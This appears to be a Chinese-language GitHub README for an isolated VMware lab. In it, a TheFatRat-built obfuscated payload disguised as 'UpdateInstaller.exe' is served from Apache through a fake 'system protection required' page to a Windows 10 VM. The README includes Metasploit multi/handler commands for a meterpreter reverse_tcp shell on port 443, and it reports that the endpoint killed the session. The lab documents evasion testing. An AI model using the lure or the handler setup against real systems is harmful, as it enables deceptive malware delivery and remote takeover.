MazenElgyoshi/-Windows-10-Endpoint-Security-Runtime-Evasion-Analysis-Lab

# Windows 10 端点安全与运行时规避分析实验室 ## 1. 执行摘要 本实验室环境演示了使用分阶段框架进行的本地网络攻击模拟。其目的是评估网络连通性，通过本地 Web 服务器（Apache）模拟投递机制，并分析 Windows 10 默认配置下的端点响应机制。 实验室成功验证了初始投递指标和分阶段握手。然而，在运行时执行阶段，端点的动态内存保护机制成功进行了干预，终止了 payload 进程（`Session Died`）。本仓库记录了此防御规避测试平台的详细技术时间线和结构分析。 ## 2. 基础设施与网络架构 该环境托管在隔离的 hypervisor 虚拟网络（VMware Workstation）内，由两个主要节点组成： * **攻击节点：** Kali Linux 2025 (`192.168.1.3`) * **目标节点：** Windows 10 x64 企业评估版 (`192.168.1.8`) ### 网络与路由验证 在初始化投递通道之前，通过 ICMP 回显建立了初始网络验证，以确保目标与宿主控制器之间的数据包路由稳健。 | 指标 | 数值 | | :--- | :--- | | **Ping 统计信息** | 发送 4 个，接收 4 个，0% 丢包 | | **平均往返时间** | 1ms | | **网络环境** | 本地 Host-Only / NAT 网段 | ## 3. 实施蓝图与阶段 ### 阶段 1：Payload 生成与配置 使用自动化编译框架，制作了一个多阶段混淆的可执行文件，以促进初始反向分阶段连接。 * **使用框架：** TheFatRat (PwnWinds 模块 v1.5) * **目标协议：** Multi/Handler 反向分阶段 (`reverse_https` 和 `reverse_tcp`) * **编译基础：** C# Wrapper Object * **输出目标二进制文件：** `UpdateInstaller.exe` ### 阶段 2：本地投递架构 为了模拟企业级的水坑攻击或偷渡式下载向量，在宿主机上初始化了内部 Apache2 Web 服务器。编译后的构建产物被直接部署到服务器的根目录：`/var/www/html/`。 本地设计了定制的 HTML/CSS 界面，以模拟官方的“需要系统保护操作”通知页面，将二进制构建产物直接映射到用户操作输入。 ## 4. 实证技术发现与证据 以下是实验室测试阶段捕获的经过验证的按时间顺序的执行序列： ### 阶段 A：环境发现与工具初始化 测试环境验证了宿主网络指标（`ifconfig`），并在隔离的测试控制台中初始化了编译菜单配置。 *诊断参考：* * 网络路由验证：匹配本地子网掩码。 * 框架设置：通过顺序输入菜单映射目标选项。 ### 阶段 B：Handler 就绪与反向入口 Metasploit 的 multi-handler 跨不同配置（端口 443 上的 `reverse_https` 和端口 443 上的 `reverse_tcp`）进行了部署，以拦截活动的回调数据包。 ``` msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 192.168.1.3 msf exploit(multi/handler) > set LPORT 443 msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.3:443 ```

标签：DNS 反向解析, Go语言工具, IP 地址批量处理, 免杀测试, 安全测试, 搜索语句（dork）, 攻击性安全, 攻击模拟, 数据展示, 红队, 靶场环境, 驱动签名利用